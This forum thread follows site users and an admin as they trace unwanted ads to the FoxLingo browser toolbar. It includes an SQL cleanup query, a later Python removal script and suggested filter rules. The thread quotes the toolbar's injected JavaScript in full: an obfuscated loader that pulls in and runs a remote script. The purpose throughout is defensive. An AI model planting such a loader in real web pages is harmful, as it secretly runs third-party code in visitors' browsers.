Ads on BLF???

You're right, my guess is it is a "virus" of some sort that is doing it since it is more than one person.

Edit: Sb beat me to it. ;) I'll throw out this link, where people were having trouble with foxlingo crashing things etc.

I was just about to say the same thing. Looks like it’s not their ‘fault’. They’re just lax in system security, and are being taken advantage of by the FoxLingo toolbar…

PPtk

Ref: #.appears after URL. And unknown script inserted | WordPress.org

FoxLingo automatically injecting JavaScript code into edited HTML (JavaScript is launching the Ad, Posts on this forum are HTML)

Just gonna put it out there that I hate browser toolbars or any other “force it down your throat” crap that comes with the program you’re trying to install.

I DON’T WANT IT!

Likely you guys are right on this one.

Thanks very much PPtk. For a website admin I am shockingly ignorant about SQL queries.

Could you please help me with a query in the comments table to replace all occurrences of example.com with example.com? I want to disable all of those ads by editing the link to their adserver, but I still want to leave the evidence for later investigation.

UPDATE [COMMENTS_TABLE] SET [COMMENT_TEXT]=REPLACE([COMMENT_TEXT], 'example.com', 'example.com') WHERE [COMMENT_TEXT] LIKE '%example.com%'

Again, replace [COMMENTS_TABLE] with the table name and [COMMENT_TEXT] with the column name where the actual post text is located.

PPtk

Don’t Do It! It’s not showing up correctly! Don’t Do what I Just said… Standby.

No worries, I didn’t run anything yet. What isn’t showing up correctly?

There is “stuff” after the word REPLACE that isn’t showing up…

Click This
http://budgetlightforum.com/comment/reply/16860/293043?quote=1#comment-form

And you’ll see it in the quote… Just grab it from there and run it.

Ah, I see. Nice catch. You can enclose code segments in @ marks like this so the filter system doesn’t modify it.

But your @ marks didn't show up there. ;)

Gotcha. I’m not used to Drupal. I tried enclosing it in [CODE] and [/CODE] tags, which didn’t work…
I updated the original post so that it’s correct for historical reference.

This board could use a [code][/code] feature.. and an "ignorance" mode for that javascript stuff. :P

@<script id="FoxLingoJs" type="text/javascript">// <![CDATA[
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//example.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();
// ]]></script>@

But @@ works.. kinda. Didn't quite work on the admin's post scaru quoted.

To prevent this in the future, adding the word “javascript” to the “Bad Words” list in Drupal should do the trick.

Couldn't he just add something more specific like "script id=" so that java code wouldn't work, but people could still say the word javascript?

Yeah. I suppose. Who would want to say javascript (Bleh) though? :slight_smile:

In most cases, javascript is the problem, not the solution.

The thing is, many of our users like to do beamshots with mouseover comparisons, which would also be eliminated.

Oh, in that case (I use them too) maybe just block "foxlingo" to at least stop these ads.

Looks like you did the update to example.com… How long did that update query take to run? How many records modified? Just curious…

Worked great, thanks! 25 records were modified.

So, after the two affected users are notified, I would like to remove the whole script. How can I do that with an SQL query? I’m sure many of those characters need to be escaped somehow. Here’s the original offending code: <script id="FoxLingoJs" type="text/javascript">// <![CDATA[!function(){try{var - Pastebin.com

Thanks a ton for the technical support PilotPTK!

My pleasure sb,

Removing the entire offending code is a little more complex. I’d have to see exactly how it looks in the actual SQL return.

If it’s pointing to example.com now, it’s really pretty harmless… I’m not sure I’d even waste the time cleaning up those 25 posts…
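The cleanup asked about above (removing the whole injected block while keeping the evidence), as an added example that is not part of the original thread. It assumes the script is stored unescaped in the form quoted earlier; the tables `comments` and `comments_quarantine`, their columns and the sample rows are constructed for illustration, with SQLite standing in for the forum's database.

```python
import re
import sqlite3

# Matches the whole injected element, keyed on the id quoted in the thread.
FOXLINGO_RE = re.compile(
    r'<script\b[^>]*\bid=["\']FoxLingoJs["\'][^>]*>.*?</script>\s*',
    re.IGNORECASE | re.DOTALL,
)

# Constructed sample data; the injected block follows the shape quoted in the thread.
INJECTED = (
    '<script id="FoxLingoJs" type="text/javascript">// <![CDATA[\n'
    '!function(){try{var s=document.createElement("script");'
    's.src="//example.com/products/FoxLingo/default/snippet.js";}catch(ex){}}();\n'
    '// ]]></script>'
)
SAMPLE_ROWS = [
    (1, "<p>Nice beamshots!</p>" + INJECTED),
    (2, "<p>Search your posts for FoxLingoJs to check.</p>"),  # mention only
    (3, '<img src="a.jpg" onmouseover="this.src=\'b.jpg\'">'),  # mouseover comparison
]


def build_demo_db():
    """In-memory stand-in for the forum database (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comments (cid INTEGER PRIMARY KEY, body TEXT)")
    conn.executemany("INSERT INTO comments VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def strip_foxlingo(conn):
    """Copy affected rows to a quarantine table, then remove the script block."""
    conn.execute("CREATE TABLE IF NOT EXISTS comments_quarantine (cid INTEGER, body TEXT)")
    rows = conn.execute(
        "SELECT cid, body FROM comments WHERE body LIKE ?", ("%FoxLingoJs%",)
    ).fetchall()
    changed = 0
    with conn:  # one transaction: evidence copy and cleanup commit together
        for cid, body in rows:
            cleaned = FOXLINGO_RE.sub("", body)
            if cleaned == body:
                continue  # mentions the id but contains no matching element
            conn.execute("INSERT INTO comments_quarantine VALUES (?, ?)", (cid, body))
            conn.execute("UPDATE comments SET body = ? WHERE cid = ?", (cleaned, cid))
            changed += 1
    return changed
```

Doing the match in application code rather than in a single SQL `REPLACE` means the exact stored bytes of each injected block do not need to be known in advance, and posts that merely mention the script id are left alone.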

LMAO! Very disturbing indeed! :bigsmile: